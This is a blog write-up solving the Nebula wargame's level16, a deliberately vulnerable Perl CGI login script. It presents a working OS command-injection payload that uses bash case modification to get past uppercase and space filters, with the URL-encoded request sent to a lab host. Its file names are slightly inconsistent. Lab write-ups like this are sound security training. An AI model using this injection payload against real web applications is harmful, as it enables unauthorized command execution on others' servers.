Friday, November 2, 2012

exploit-exercises Nebula: level16

another level in the Nebula wargame and another os command injection vulnerability. The source code is provided.
#!/usr/bin/env perl

use CGI qw{param};

print "Content-type: text/html\n\n";
sub login {
$username = $_[0];
$password = $_[1];

$username =~ tr/a-z/A-Z/; # convert to uppercase
$username =~ s/\s.*//; # strip everything after a space

@output = `egrep "^$username" /home/flag16/userdb.txt 2>&1`;
foreach $line (@output) {
($usr, $pw) = split(/:/, $line);

if($pw =~ $password) {
return 1;
}
}

return 0;
}

sub htmlz {
print("Login resuls");
if($_[0] == 1) {
print("Your login was accepted
");
} else {
print("Your login failed
");
}
print("Would you like a cookie?\n");
}

htmlz(login(param("username"), param("password")));
The username parameter is vulnerable to command injection, but there are some restrictions that we should bypass. The content of the username parameter is converted to uppercase and everything that follows the first space is stripped out.
$username =~ tr/a-z/A-Z/; # conver to uppercase
$username =~ s/\s.*//; # strip everything after a space
To bypass these restrictions, we will use case modifications.
we first close the double quote (and provide egrep with null input), we assign /tmp/pwn to the pwnvar variable and apply ,, case modification to pwnvar's value to lowercase it again, we end the command and comment out what comes next. Our payload will be "</dev/null;pwnvar=/tmp/pwn;${pwnvar,,};#
level16@nebula:~$ cat /tmp/pwn16
#!/bin/sh
/bin/getflag > /tmp/pwnie16
URL Encode our payload %22%3C%2Fdev%2Fnull%3Bpwnvar%3D%2Ftmp%2Fpwn16%3B%24%7Bpwnvar%2C%2C%7D%3B%23
and launch the exploit http://192.168.56.101:1616/index.cgi?username=%22%3C%2Fdev%2Fnull%3Bpwnvar%3D%2Ftmp%2Fpwn16%3B%24%7Bpwnvar%2C%2C%7D%3B%23
level16@nebula:~$ cat /tmp/pwnage
You have successfully executed getflag on a target account

No comments:

Post a Comment